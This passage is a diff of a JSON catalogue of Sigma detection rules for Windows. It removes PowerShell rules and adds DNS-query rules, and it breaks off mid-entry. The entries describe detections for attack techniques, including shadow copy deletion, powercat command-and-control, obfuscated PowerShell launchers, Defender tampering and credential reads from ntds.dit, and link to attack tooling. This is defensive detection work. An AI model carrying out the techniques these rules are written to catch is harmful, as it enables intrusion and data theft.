- "falsepositive": [ - "Unknown" - ], 
- "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" - ], - "tags": [ - "attack.t1047", - "attack.execution" - ] - }, - "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "value": "WMI Event Consumer Created Named Pipe" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "filename": "posh_pc_alternate_powershell_hosts.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", - "value": "Alternate PowerShell Hosts" - }, - { - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "meta": { - "author": "frack113", - "creation_date": "2021/06/03", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" - ], - "filename": "posh_pc_delete_volume_shadow_copies.yml", - "level": "high", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "value": "Delete Volume Shadow Copies Via WMI With PowerShell" - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "meta": { - "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", - "creation_date": "2017/03/22", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_downgrade_attack.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6331d09b-4785-4c13-980f-f96661356249", - "value": "PowerShell Downgrade Attack - PowerShell" - }, - { - "description": "Detects PowerShell called from an executable by the version mismatch method", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_exe_calling_ps.yml", - "level": "high", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "value": "PowerShell Called from an Executable Version Mismatch" - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_powercat.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" ], "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1219" ] }, - "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", - "value": "Netcat The Powershell Version" + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access" }, { - "description": "Detects remote PowerShell sessions", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", + "author": "frack113", + "creation_date": "2022/02/20", "falsepositive": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], - "filename": "posh_pc_remote_powershell_session.yml", + "filename": "dns_query_win_tor_onion.yml", "level": "high", - "logsource.category": "ps_classic_start", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - 
"https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.command_and_control", + "attack.t1090.003" ] }, - "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", - "value": "Remote PowerShell Session (PS Classic)" + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address" }, { - "description": "Detects renamed powershell", - "meta": { - "author": "Harish Segar, frack113", - "creation_date": "2020/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_renamed_powershell.yml", - "level": "low", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", - "value": "Renamed Powershell Under Powershell Channel" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "Detect suspicious LDAP request from non-Windows application", "meta": { "author": "frack113", - "creation_date": "2021/07/13", + "creation_date": "2022/08/20", "falsepositive": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "filename": "dns_query_win_susp_ldap.yml", 
"level": "medium", - "logsource.category": "No established category", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" - }, - { - "description": "Detects suspicious PowerShell download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_pc_susp_download.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "value": "Suspicious PowerShell Download" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_susp_get_nettcpconnection.yml", - "level": "low", - 
"logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" ], "tags": [ "attack.discovery", - "attack.t1049" + "attack.t1482" ] }, - "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", - "value": "Use Get-NetTCPConnection" + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. 
(DNS-record will saved in host cache for a while TTL).", "meta": { - "author": "frack113", - "creation_date": "2021/07/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_susp_zip_compress.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" - }, - { - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "meta": { - "author": "frack113", - "creation_date": "2021/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_tamper_with_windows_defender.yml", - "level": "high", - "logsource.category": "ps_classic_provider_start", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "value": "Tamper Windows Defender - PSClassic" - }, - { - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml", - "level": 
"medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "value": "Suspicious Non PowerShell WSMAN COM Provider" - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "meta": { - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "creation_date": "2020/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_xor_commandline.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "filename": "posh_pm_alternate_powershell_hosts.yml", - "level": "medium", - "logsource.category": 
"ps_module", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", - "value": "Alternate PowerShell Hosts - PowerShell Module" - }, - { - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "meta": { - "author": "ok @securonix invrep_de, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." 
- ], - "filename": "posh_pm_bad_opsec_artifacts.yml", - "level": "critical", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://www.mdeditor.tw/pl/pgRt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "value": "Bad Opsec Powershell Code Artifacts" - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "meta": { - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_pm_clear_powershell_history.yml", + "falsepositive": "No established falsepositives", + "filename": "dns_query_win_possible_dns_rebinding.yml", "level": "medium", - "logsource.category": "ps_module", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "value": "Clear PowerShell History - PowerShell Module" - }, - { - "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_decompress_commands.yml", - "level": "informational", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/8", - "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "value": "PowerShell Decompress Commands" - }, - { - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_get_addbaccount.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", - "value": "Suspicious Get-ADDBAccount Usage" - }, - { - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_get_clipboard.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "value": "PowerShell Get Clipboard" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": 
"posh_pm_invoke_obfuscation_obfuscated_iex.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "2f211361-7dce-442d-b78a-c04039677378", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" - }, - { - "description": "Detects Obfuscated 
Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", - "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" - }, - { - "description": 
"Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_powercat.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ] - }, - "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", - "value": "Netcat The Powershell Version - PowerShell Module" - }, - { - "description": "Detects remote PowerShell sessions", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/08/10", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "filename": "posh_pm_remote_powershell_session.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "value": "Remote PowerShell Session (PS Module)" - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this 
